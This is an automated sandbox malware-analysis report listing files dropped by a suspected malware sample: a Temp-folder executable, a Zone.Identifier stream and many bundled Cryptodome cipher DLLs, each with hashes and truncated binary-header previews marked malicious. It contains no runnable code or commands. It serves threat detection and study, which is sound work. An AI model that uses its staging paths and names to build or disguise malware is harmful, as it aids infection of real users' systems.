                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................1...........@...........................2......82...@.................................W...k.............................1.............................L.1..................................................... . ............................@....rsrc...............................@....idata ............................@...lwujlavl. +.......+.................@...zofmlovi......1.......1.............@....taggant.0....1.."....1.............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\ebjtOH70jl.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_ARC4.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):11264
                                                                                                                                                                                                                                                  Entropy (8bit):4.634028407547307
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:z8MwxTCa5Xv7BelL7u1R/r8qJ7pfpsPG6QEYHGBp5WCmNniHisDJ9UFv4:zTwxTltlelL7urFfUQa5NmYjDLU
                                                                                                                                                                                                                                                  MD5:BA43C9C79B726F52CD3187231E3A780F
                                                                                                                                                                                                                                                  SHA1:EC0538F8F32F3C58CB7430E82C416B44C0B03D12
                                                                                                                                                                                                                                                  SHA-256:7B5E1F955E198278A39B94F6AC18D49CEE21B99C8A951DE722FF99A153162A0B
                                                                                                                                                                                                                                                  SHA-512:A74056F9D853B2F020800D9DB0C1C50AD704E5DBD6B9A0A169E1BCC6299AB02E5D1F6A9C0A4FEBE9E14D8FE3264D836E67ADCD1AD2F1C380FED4A98A48E3F3E3
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................@......................@.......@.......@.......f.......f.......f.......f.......Rich............................PE..d...a."`.........." ................T........................................p............`.........................................`'.......(..d....P.......@...............`..$....!...............................!..8............ ...............................text............................... ..`.rdata..*.... ......................@..@.data...H....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..$....`.......*..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_Salsa20.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13824
                                                                                                                                                                                                                                                  Entropy (8bit):5.010720322611065
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:EUBpDmr37utd9PHv2DznuRGMeS4JUHNDLUYd:mDit6DCVn4WZUW
                                                                                                                                                                                                                                                  MD5:991AA4813AF0ADF95B0DF3F59879E21C
                                                                                                                                                                                                                                                  SHA1:E44DB4901FFBBB9E8001B5B3602E59F6D2CCC9C8
                                                                                                                                                                                                                                                  SHA-256:5B86D84DA033128000D8BC00A237AB07D5FF75078216654C224854BEC0CD6641
                                                                                                                                                                                                                                                  SHA-512:C6A9DB8338330AB45A8522FBEF5B59374176AC4BF2C0BAE6471AA6FA4710B7EFE20E9331BA542FA274D32DE623A0B578A1A048765F000F74B1608FFA05E5C550
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................K........................&.......................................'............Rich....................PE..d...b."`.........." ................T.....................................................`.........................................@8.......9..d....`.......P..L............p..$....1...............................1..8............0...............................text...x........................... ..`.rdata..2....0......................@..@.data...H....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..$....p.......4..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_chacha20.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13312
                                                                                                                                                                                                                                                  Entropy (8bit):5.030943993303202
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:fhgUBpDmr37utd9PVv2Jnl0Ne3erKr5okiy0Y23RAr2Z9lkNCqDLU/:sDitwJooNiyX2hUA9f0U/
                                                                                                                                                                                                                                                  MD5:43C8516BE2AE73FB625E8496FD181F1C
                                                                                                                                                                                                                                                  SHA1:6D38E8EE6D38759FDBA6558848DA62BB3FB51EC8
                                                                                                                                                                                                                                                  SHA-256:3A1ACFA87110ACE2F8B8F60B03E264F22E2B7E76B53AD98C3B260686B1C27C57
                                                                                                                                                                                                                                                  SHA-512:B8DCD4875EF7759DA1F8B96FC85DAC8910720C8168F09AC52DAF85C637955274093530406BE2A58EF237BFAB8CCDF4F06F96EBA7ADFC4F413CBF0E5A7D447774
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................K........................&.......................................'............Rich....................PE..d...b."`.........." ................T.....................................................`..........................................7.......8..d....`.......P..d............p..$....1...............................1..8............0...............................text...(........................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..$....p.......2..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_aes.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):35840
                                                                                                                                                                                                                                                  Entropy (8bit):6.5985845002689825
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:ZOISQpPUUllvxL/7v/iKBt5ByU0xGitqzSEkxGG7+tpKHb/LZ7fr52E0H680xz4e:nLh7JbH1G4sS4j990th9VQFI
                                                                                                                                                                                                                                                  MD5:DACF0299F0ACD196C0B0C35440C9CF78
                                                                                                                                                                                                                                                  SHA1:CFFD37FE04854D60E87058B33CA313F532879BF7
                                                                                                                                                                                                                                                  SHA-256:1199152F31FC5179FD39733B6B7D60B7F4A7269FE28CBC434F87FA53810B305D
                                                                                                                                                                                                                                                  SHA-512:7FFA5A8979F4258968E37540348E62FD22C795981F4AA9A6962DDEC17CEC8265EC7A7FF7EE4A2EBADF4DA35062972E4C7ADF7C8D4031B60AE218872807E092D9
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................@......................@.......@.......@.......f.......f.......f.......f.......Rich............................PE..d...]."`.........." .....H...F......T.....................................................`.........................................0...........d...............................0......................................8............`...............................text....G.......H.................. ..`.rdata...5...`...6...L..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_aesni.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):15360
                                                                                                                                                                                                                                                  Entropy (8bit):5.181873142782463
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:9Ee15je/I3TuvPfB1LeLi2jcXdq2QdeJgDZETDRcYcaKAADLU5YUod:992Y6/B1KL4XdQdggDZ8EU5YUm
                                                                                                                                                                                                                                                  MD5:5D1CAEEDC9595EC0A30507C049F215D7
                                                                                                                                                                                                                                                  SHA1:B963E17679A0CB1EFDC388B8218BE7373DE8E6CC
                                                                                                                                                                                                                                                  SHA-256:A5C4143DDFA6C10216E9467A22B792541096E222EFE71C930A5056B917E531A0
                                                                                                                                                                                                                                                  SHA-512:BE8471BE53AFA1EDCAA742B7D1D4222D15D4682BA8E1F8376FC65C46CCC5FE0890D24BBAFB6616F625D5D37A087762317EBAA4AE6518443E644FA01EBC4496E5
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................[........................*.......................................7............Rich....................PE..d...]."`.........." ......... ......T.....................................................`.........................................p9.......:..d....`.......P...............p..$....1...............................1..8............0.. ............................text............................... ..`.rdata.......0......."..............@..@.data...8....@.......2..............@....pdata.......P.......4..............@..@.rsrc........`.......8..............@..@.reloc..$....p.......:..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_arc2.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                  Entropy (8bit):5.400580637932519
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:rEJe0rPeLTuUt4/wgroOCouz7ucc9dJ7oAAokDLU45Gc:3mUGr9n6769laU45
                                                                                                                                                                                                                                                  MD5:4795B16B5E63AEE698E8B601C011F6E6
                                                                                                                                                                                                                                                  SHA1:4AA74966B5737A818B168DA991472380FE63AD3E
                                                                                                                                                                                                                                                  SHA-256:78DB7D57C23AC96F5D56E90CFB0FBB2E10DE7C6AF48088354AA374709F1A1087
                                                                                                                                                                                                                                                  SHA-512:73716040ECF217E41A34FADEA6046D802982F2B01D0133BFD5C215499C84CB6D386AF81235CA21592722F57EA31543D35B859BE2AF1972F347C93A72131C06C2
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...]."`.........." ....."... ......T.....................................................`.........................................@I.......I..d....p.......`..................$....B...............................B..8............@...............................text...8 .......".................. ..`.rdata.......@.......&..............@..@.data...H....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..$............>..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_blowfish.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):6.159203027693185
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:iUpJ7Grjup/vx81AguKUiZA3OkJYkO8d3KobfoHJAyZJg8D0KThxA+rAQE+tnJi8:I2XKAs3ZArTvHbgpJgLa0Mp83xhUoz
                                                                                                                                                                                                                                                  MD5:9F33973B19B84A288DF7918346CEC5E4
                                                                                                                                                                                                                                                  SHA1:A646146337225D3FA064DE4B15BF7D5C35CE5338
                                                                                                                                                                                                                                                  SHA-256:DC86A67CFF9CB3CC763AAAB2D357EC6DBC0616A5DFC16EBE214E8E2C04242737
                                                                                                                                                                                                                                                  SHA-512:D7FFA4A640EBD2C9121DBD1BA107B5D76C0385524C4F53DE6FDA1BB0EC16541CEF1981F7E1DAA84F289D4A7D566B0620690AF97AF47F528BBF5B2CD6E49FE90C
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...^."`.........." .....$..........T.....................................................`..........................................X.......Y..d............p..................0....Q...............................R..8............@...............................text...H#.......$.................. ..`.rdata.......@.......(..............@..@.data...H....`.......F..............@....pdata.......p.......H..............@..@.rsrc................L..............@..@.reloc..0............N..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_cast.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):24576
                                                                                                                                                                                                                                                  Entropy (8bit):6.493034619151615
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:pksGDsFSQkHUleKaZXmrfXA+UA10ol31tuXOQkUdT:kTK0K4XmrXA+NNxW+Ud
                                                                                                                                                                                                                                                  MD5:89D4B1FC3A62B4A739571855F22E0C18
                                                                                                                                                                                                                                                  SHA1:F0F6A893A263EEEB00408F5F87DC9ABB3D3259A6
                                                                                                                                                                                                                                                  SHA-256:3832F95FE55D1B4DA223DF5438414F03F18D5EF4AAFD285357A81E4ED5AD5DA1
                                                                                                                                                                                                                                                  SHA-512:20C713564C0658FD7A26F56BF629B80FCB4E7F785E66A00163933D57C8E5A344F6B0476F7395A6D8A526D78A60C85884CEFF6B3F812A8EE07E224C9E91F878C1
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................K........................&.......................................'............Rich....................PE..d...^."`.........." .....$...>............................................................`.........................................@h.......h..d...............................0....a...............................a..8............@...............................text...x".......$.................. ..`.rdata...,...@.......(..............@..@.data...H....p.......V..............@....pdata...............X..............@..@.rsrc................\..............@..@.reloc..0............^..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_cbc.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                                                                  Entropy (8bit):4.700268562557766
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:zh05p7mr3Tutd9PUv2anKfI1ve86rYDLUa:tD6t/GKfevTTUa
                                                                                                                                                                                                                                                  MD5:73DD025BFA3CFB38E5DAAD0ED9914679
                                                                                                                                                                                                                                                  SHA1:65D141331E8629293146D3398A2F76C52301D682
                                                                                                                                                                                                                                                  SHA-256:C89F3C0B89CFEE35583D6C470D378DA0AF455EBD9549BE341B4179D342353641
                                                                                                                                                                                                                                                  SHA-512:20569F672F3F2E6439AFD714F179A590328A1F9C40C6BC0DC6FCAD7581BC620A877282BAF7EC7F16AAA79724BA2165F71D79AA5919C8D23214BBD39611C23AED
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...`."`.........." ................T.....................................................`..........................................7.......8..d....`.......P..X............p..$....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..$....p......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_cfb.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13312
                                                                                                                                                                                                                                                  Entropy (8bit):4.99372428436515
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:Dardk3qQb3GukBPZCLfSQl+x5DLUzbgd6:dNzFkHCLKUzbO
                                                                                                                                                                                                                                                  MD5:E87AAC7F2A9BF57D6796E5302626EE2F
                                                                                                                                                                                                                                                  SHA1:4B633501E76E96C8859436445F38240F877FC6C6
                                                                                                                                                                                                                                                  SHA-256:97BF9E392D6AD9E1EC94237407887EA3D1DEC2D23978891A8174C03AF606FD34
                                                                                                                                                                                                                                                  SHA-512:108663F0700D9E30E259A62C1AE35B23F5F2ABD0EFF00523AAE171D1DB803DA99488C7395AFD3AD54A242F0CB2C66A60E6904D3E3F75BB1193621FD65DF4AD5C
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................@....................@......@......@......f......f......f.~.....f......Rich....................PE..d...`."`.........." ................T.....................................................`..........................................8......H9..d....`.......P..d............p..$....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..$....p.......2..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ctr.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):14848
                                                                                                                                                                                                                                                  Entropy (8bit):5.274628449067808
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:ktVGzeoI3DuzPpcAdXdO57EEE/quBiFElcUNIDLUnF6+ud:nNYqFcAdXdDqurIUnUp
                                                                                                                                                                                                                                                  MD5:F3F30D72D6D7F4BA94B3C1A9364F1831
                                                                                                                                                                                                                                                  SHA1:46705C3A35C84BF15CF434E2607BDDD18991E138
                                                                                                                                                                                                                                                  SHA-256:7820395C44EAB26DE0312DFC5D08A9A27398F0CAA80D8F9A88DEE804880996FF
                                                                                                                                                                                                                                                  SHA-512:01C5EA300A7458EFE1B209C56A826DF0BF3D6FF4DD512F169D6AEE9D540600510C3249866BFB991975CA5E41C77107123E480EDA4D55ECCB88ED22399EE57912
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........o....................@......................@.......@.......@.......f.......f.......f.......f.......Rich............................PE..d...a."`.........." ......... ......T.....................................................`.........................................P9.......:..d....`.......P...............p..$....1...............................1..8............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..$....p.......8..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_des.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):56832
                                                                                                                                                                                                                                                  Entropy (8bit):4.23001088085281
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:m3gj0/sz71dv/ZHkVnYcZiGKdZHDLIK4vnKAnKorZOzUbq+K9:7jssHZHTr4vZHb69
                                                                                                                                                                                                                                                  MD5:020A1E1673A56AF5B93C16B0D312EF50
                                                                                                                                                                                                                                                  SHA1:F69C1BB224D30F54E4555F71EA8CAD4ACB5D39BC
                                                                                                                                                                                                                                                  SHA-256:290B3ED6151B7BF8B7B227EF76879838294F7FF138AF68E083C2FDDC0A50E4FC
                                                                                                                                                                                                                                                  SHA-512:71B5ED33B51F112896BB59D39B02010B3ABC02B3032BD17E2AA084807492DA71BDE8F12ADEF72C6CC0A5A52D783CD7595EEC906C394A21327ADAB2927E853B1F
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Sj..2...2...2...J...2..LC...2...Y...2...2...2..LC...2..LC...2..LC...2..j@...2..j@...2..j@...2..j@...2..Rich.2..........................PE..d..._."`.........." .....6...................................................0............`.....................................................d...............l............ ..0... ...............................@...8............P...............................text....5.......6.................. ..`.rdata..T....P.......:..............@..@.data...H...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_des3.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):57344
                                                                                                                                                                                                                                                  Entropy (8bit):4.2510443883540265
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:wVgj0/sKzNweVC/ZHkNnYcZiGKdZHDLaK0vnKAnKLrZVwUbqeo:njsskKZHLR0vZmbx
                                                                                                                                                                                                                                                  MD5:EC55478B5DD99BBE1EBA9D6AD8BDE079
                                                                                                                                                                                                                                                  SHA1:EC730D05FEEC83B1D72784C2265DC2E2CF67C963
                                                                                                                                                                                                                                                  SHA-256:1AF46CBE209E3F1D30CCC0BA9F7E5A455554CAF8B1E3E42F9A93A097D9F435AC
                                                                                                                                                                                                                                                  SHA-512:55FE28E839117A19DF31165FEA3DED3F9DFC0DDA16B437CF274174E9AE476C0E5B869FFB8B2CF1880189BFAC3917E8D7078FA44FC96CFF18DC6EAC7AFA7A8F48
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Sj..2...2...2...J...2..LC...2...Y...2...2...2..LC...2..LC...2..LC...2..j@...2..j@...2..j@...2..j@...2..Rich.2..........................PE..d..._."`.........." .....8...................................................0............`.................................................`...d............................ ..0... ...............................@...8............P...............................text...h7.......8.................. ..`.rdata.......P.......<..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ecb.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                  Entropy (8bit):4.689882120894326
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:5D8MdJTCaDAH37Belrzu1x/r8qJ7pfJsPG6QxmFWymc3doBKumsLVsDJ9UKvL:lTdJTlDmNelrzuLFf0Qg4yxlumQCDLU
                                                                                                                                                                                                                                                  MD5:93DA52E6CE73E0C1FC14F7B24DCF4B45
                                                                                                                                                                                                                                                  SHA1:0961CFB91BBCEE3462954996C422E1A9302A690B
                                                                                                                                                                                                                                                  SHA-256:DDD427C76F29EDD559425B31EEE54EB5B1BDD567219BA5023254EFDE6591FAA0
                                                                                                                                                                                                                                                  SHA-512:49202A13D260473D3281BF7CA375AC1766189B6936C4AA03F524081CC573EE98D236AA9C736BA674ADE876B7E29AE9891AF50F1A72C49850BB21186F84A3C3AB
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mr..............t......,}.......g..............,}......,}......,}.......~.......~.......~.......~......Rich............................PE..d...`."`.........." ................T........................................p............`..........................................&.......'..P....P.......@...............`..$....!...............................!..8............ ...............................text............................... ..`.rdata..p.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....`.......&..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_eksblowfish.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):21504
                                                                                                                                                                                                                                                  Entropy (8bit):6.2360102418962855
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:42XHEtPwbdvIbwKBBEHYpJgLa0Mp8u9sLgU:jHMobBiB+HqgLa1Kx
                                                                                                                                                                                                                                                  MD5:3D34E2789682844E8B5A06BE3B1C81BF
                                                                                                                                                                                                                                                  SHA1:0141D82B4B604E08E620E63B8257FB6A1E210CAF
